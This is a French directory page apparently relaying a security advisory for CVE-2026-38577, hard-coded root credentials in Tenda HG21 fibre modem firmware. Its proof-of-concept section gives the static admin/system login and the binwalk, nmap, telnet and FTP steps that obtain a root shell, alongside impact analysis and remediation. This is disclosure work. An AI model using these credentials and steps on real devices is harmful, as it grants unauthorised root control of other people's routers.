Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/poxsky/cve-2026-38577-by-deepak-anmol
Sécurité des Systèmes EmbarquésSécurité IoTAnalyse des VulnérabilitésExploitationTests d'IntrusionSécurité Matériel et IoTAnalyse de Micrologiciel
GitHubpoxsky/cve-2026-38577-by-deepak-anmol

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-38577-by-deepak-Anmol

Preuve de concept démontrant des identifiants root codés en dur (admin/system) dans le firmware du modem XPON Tenda HG21, permettant un accès root non autorisé via telnet et FTP.

Voir le dépôt
il y a 9h 27mPas encore vérifié

CVE-2026-38577 — Identifiants root codés en dur dans le routeur Tenda HG21

Résumé

ChampValeur
ID CVECVE-2026-38577
FournisseurTenda
ProduitTenda HG21 (modem fibre XPON)
Version concernéeV4.0.0-260302
Clé produitHG21-V1.0-TDE01
Version matérielleV1.0
Date de compilation du firmware2026-03-02
Fichier du firmwareUS_HG21re_300002982_en_xpon_2.zip
Classe de vulnérabilitéCWE-798 : utilisation d'identifiants codés en dur
DécouvreurAnmol Singh Rajput — chercheur en sécurité indépendant
Statut de divulgationFournisseur pas encore notifié au moment de la réservation du CVE — un délai de divulgation responsable de 90 jours s'applique à compter de la date d'attribution du CVE

Description

L'analyse du firmware du modem fibre XPON Tenda HG21 a révélé un compte administratif codé en dur intégré à l'image du firmware livré. Ce compte dispose de privilèges root complets (UID 0) et ses identifiants sont statiques sur tous les appareils, ce qui signifie que tout attaquant pouvant atteindre un service d'administration exposé sur une unité vulnérable peut s'authentifier en tant que root sans avoir besoin de connaître le mot de passe de l'interface web défini par le client.

Où cela a été trouvé

  • /etc/passwd dans le firmware extrait contient une entrée admin avec un hachage de mot de passe SHA256crypt qui correspond à la valeur statique system.
  • L'UID du compte est 0 — c'est-à-dire qu'il est root, et non un compte de service restreint.
  • Aucun /etc/shadow n'est présent, donc le hachage faible/statique dans passwd est la seule barrière protégeant le compte.
  • /etc/inetd.conf lance telnetd et ftpd, tous deux démarrés en tant que root, donc le compte codé en dur est accessible via le réseau, et pas seulement sur une console série/UART.
  • L'interface de gestion web est servie uniquement en HTTP non chiffré (pas de TLS), ce qui constitue une lacune de durcissement secondaire mais n'est pas en soi le CVE.

Impact

Un attaquant disposant d'un accès réseau aux services telnet (TCP/23) ou FTP (TCP/21) d'un appareil vulnérable peut se connecter en tant qu'admin avec le mot de passe statique et obtenir un shell root / un accès aux fichiers au niveau root. Cela permet, au minimum :

  • Exécution de code — shell root via telnet.
  • Élévation de privilèges — aucune frontière de privilèges n'existe ; le compte démarre en root.
  • Divulgation d'informations — accès complet au système de fichiers et à la configuration, y compris les éventuels identifiants réseau du client stockés sur l'appareil.

Vecteurs CVSS de la soumission originale (la notation du fournisseur peut différer une fois publiée) :

  • Vecteur d'attaque : réseau
  • Privilèges requis : aucun (les identifiants sont codés en dur/connus)
  • Interaction utilisateur : aucune
  • Confidentialité / Intégrité / Disponibilité : élevée / élevée / élevée

Preuve de concept

Il s'agit d'une preuve de concept basée sur les identifiants — elle démontre que le compte codé en dur s'authentifie et accorde les droits root, et non d'une exploitation de corruption mémoire. Exécutez-la uniquement contre un appareil qui vous appartient ou pour lequel vous êtes explicitement autorisé à effectuer des tests.

1. Confirmer que l'identifiant existe dans le firmware

root@kitploit:~
# Extraire le firmware (binwalk ou l'outil du fournisseur de votre choix)
binwalk -e US_HG21re_300002982_en_xpon_2.bin

# Localiser et inspecter le fichier passwd
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-hash-of-"system">:0:0:root:/root:/bin/sh

2. Confirmer que le service est accessible

root@kitploit:~
nmap -p 21,23 <target-ip>

3. S'authentifier avec le compte codé en dur

root@kitploit:~
telnet <target-ip>
# login: admin
# password: system
root@kitploit:~
ftp <target-ip>
# Name: admin
# Password: system

Une connexion réussie sur l'un ou l'autre service renvoie un shell/session FTP avec privilèges root (id indiquera uid=0(root)).

Remédiation

  • Le fournisseur doit supprimer entièrement le compte admin/system codé en dur, ou au minimum imposer un mot de passe aléatoire unique par appareil défini au premier démarrage (non dérivable du seul numéro de série).
  • Désactiver telnetd/ftpd par défaut ; exiger une activation explicite et un canal authentifié et chiffré (SSH/SFTP) pour l'administration à distance.
  • Servir l'interface de gestion uniquement en HTTPS.
  • Remplacer l'identifiant statique sur toutes les unités déjà déployées via une mise à jour du firmware obligatoire, et forcer une réinitialisation du mot de passe lors de la mise à jour.

Chronologie

DateÉvénement
2026-03-02Version vulnérable du firmware publiée
—Découverte lors d'une analyse indépendante du firmware
2026-04-09CVE-2026-38577 réservé via MITRE
—Notification au fournisseur en attente (fenêtre de divulgation de 90 jours à compter de l'attribution du CVE)

Crédits

Découvert et signalé par :

  • Anmol Singh Rajput — LinkedIn
  • Deepak G — LinkedIn

Références

  • https://www.tenda.com.cn
  • https://cwe.mitre.org/data/definitions/798.html
Télécharger l’outil